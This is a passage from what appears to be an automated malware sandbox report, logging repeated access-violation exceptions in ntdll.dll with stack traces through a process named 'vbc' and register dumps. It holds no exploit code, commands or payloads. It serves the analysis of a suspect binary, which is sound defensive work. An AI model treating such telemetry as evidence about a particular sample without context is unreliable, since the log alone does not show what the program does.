RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x772f199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x772f193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632820 registers.edi: 1632908 registers.eax: 23117 registers.ebp: 1632880 registers.edx: 0 registers.ebx: 0 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7730af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632672 registers.edi: 1632768 registers.eax: 23117 registers.ebp: 1632732 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999575552	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x772e317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7730ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7730af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x772f18ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x772f174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632804 registers.edi: 1632892 registers.eax: 23117 registers.ebp: 1632864 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1632768	1
__exception__ May 24, 2022, 6:27 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x772df5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x772df560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x772f176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x772f3e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76703b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7559db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x74007322 0x31d60ff 0x31d4133 0x31d4220 vbc+0x9ab51 @ 0x49ab51 vbc+0x9bbfe @ 0x49bbfe vbc+0x42fb @ 0x4042fb vbc+0x4363 @ 0x404363 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x772df4ef registers.esp: 1632928 registers.edi: 1633024 registers.eax: 23117 registers.ebp: 1632988 registers.edx: 0 registers.ebx: 52232192 registers.esi: 52232192 registers.ecx: 1999678976	1
